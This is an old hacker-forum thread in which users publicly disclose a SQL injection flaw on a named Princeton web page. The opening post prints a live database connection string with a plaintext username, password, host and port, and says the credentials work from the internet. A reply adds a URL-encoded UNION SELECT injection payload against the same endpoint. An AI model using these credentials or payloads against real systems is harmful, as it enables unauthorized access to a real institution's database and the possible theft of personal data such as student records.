Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
princeton.edu SQL injection/SQL username:password
Posted by: DanielG
Date: May 23, 2009 09:10AM

http://wws.princeton.edu/webmedia/list_speakers.xml?start=f'

generates the error:
RXML run error: Query failed:[...] <emit host="mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts"[...]

www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.

Is this like a major issue since it's a well known school?

--
Yeah i'm Dutch, sweeeeeeeeeeet.

Options: ReplyQuote
Re: princeton.edu SQL injection/SQL username:password
Posted by: Kyo
Date: May 23, 2009 11:22AM

it's always a major issue

http://wws.princeton.edu/webmedia/list_speakers.xml?start=f%27%20OR%201=0%20UNION%20SELECT%201--%20-

Options: ReplyQuote
Re: princeton.edu SQL injection/SQL username:password
Posted by: wireghoul
Date: May 24, 2009 08:42PM

Even worse, www-01dept.princeton.edu:3308 is internet facing and the error string contains the login. I hope your school is not storing any sensitive information in said database and that they are preparing an official breach statement.

[www.justanotherhacker.com]

Options: ReplyQuote
Re: princeton.edu SQL injection/SQL username:password
Posted by: PaPPy
Date: May 24, 2009 10:12PM

i think that was stated in the subject and first post...

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: princeton.edu SQL injection/SQL username:password
Posted by: thrill
Date: May 24, 2009 11:45PM

hmm.. maybe my old UCLA boss, Karen M. is advising them on security.. she once told me "we're a school, we have nothing a hacker would want!".. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: princeton.edu SQL injection/SQL username:password
Posted by: PaPPy
Date: May 24, 2009 11:52PM

lol, other than SSNs or some super computer that i can get my hands on to...dumb teachers

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: princeton.edu SQL injection/SQL username:password
Posted by: thrill
Date: May 25, 2009 01:20AM

She wasn't a teacher.. she was the manager of the IT department in the Administrative Information Systems.. yeah.. those same people who do control the mainframe with all the SS#'s and other vital information on all students, staff and faculty.. but yes, we do not have anything a hacker would want.. oh yeah, and linux is a 'hobby' OS, it'll never be mainstream.. another choice quote from her in 1999.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote


Sorry, only registered users may post in this forum.